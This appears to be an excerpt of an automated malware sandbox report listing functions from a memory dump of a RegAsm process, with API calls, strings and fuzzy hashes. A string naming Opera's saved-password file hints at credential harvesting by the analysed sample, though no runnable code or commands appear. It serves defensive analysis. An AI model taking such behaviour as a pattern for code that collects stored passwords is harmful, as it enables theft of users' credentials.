                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                • String ID:
                                                                • API String ID: 1471605966-0
                                                                • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                • wcscat.MSVCRT ref: 0044476E
                                                                • wcscat.MSVCRT ref: 0044477F
                                                                • wcscat.MSVCRT ref: 0044478E
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                • String ID: \StringFileInfo\
                                                                • API String ID: 102104167-2245444037
                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 004100FB
                                                                • memset.MSVCRT ref: 00410112
                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                • String ID: </%s>
                                                                • API String ID: 3400436232-259020660
                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0040D58D
                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                • String ID: caption
                                                                • API String ID: 1523050162-4135340389
                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                • String ID: MS Sans Serif
                                                                • API String ID: 210187428-168460110
                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memcmp
                                                                • String ID:
                                                                • API String ID: 3384217055-0
                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0040560C
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                • String ID: *.*$dat$wand.dat
                                                                • API String ID: 2618321458-1828844352
                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 00412057
                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                • String ID:
                                                                • API String ID: 3550944819-0
                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • free.MSVCRT ref: 0040F561
                                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$free
                                                                • String ID: g4@
                                                                • API String ID: 2888793982-2133833424
                                                                • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy
                                                                • String ID: @
                                                                • API String ID: 3510742995-2766056989
                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 004144E7
                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                • memset.MSVCRT ref: 0041451A
                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                • String ID:
                                                                • API String ID: 1127616056-0
                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                • malloc.MSVCRT ref: 00417459
                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                • free.MSVCRT ref: 0041747F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                • String ID:
                                                                • API String ID: 2605342592-0
                                                                • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                • String ID:
                                                                • API String ID: 2678498856-0
                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0040F673
                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                • String ID:
                                                                • API String ID: 2754987064-0
                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0040F6E2
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                • strlen.MSVCRT ref: 0040F70D
                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                • String ID:
                                                                • API String ID: 2754987064-0
                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscpy$CloseHandle
                                                                • String ID: General
                                                                • API String ID: 3722638380-26480598
                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                • String ID:
                                                                • API String ID: 764393265-0
                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Time$System$File$LocalSpecific
                                                                • String ID:
                                                                • API String ID: 979780441-0
                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                • String ID:
                                                                • API String ID: 1386444988-0
                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
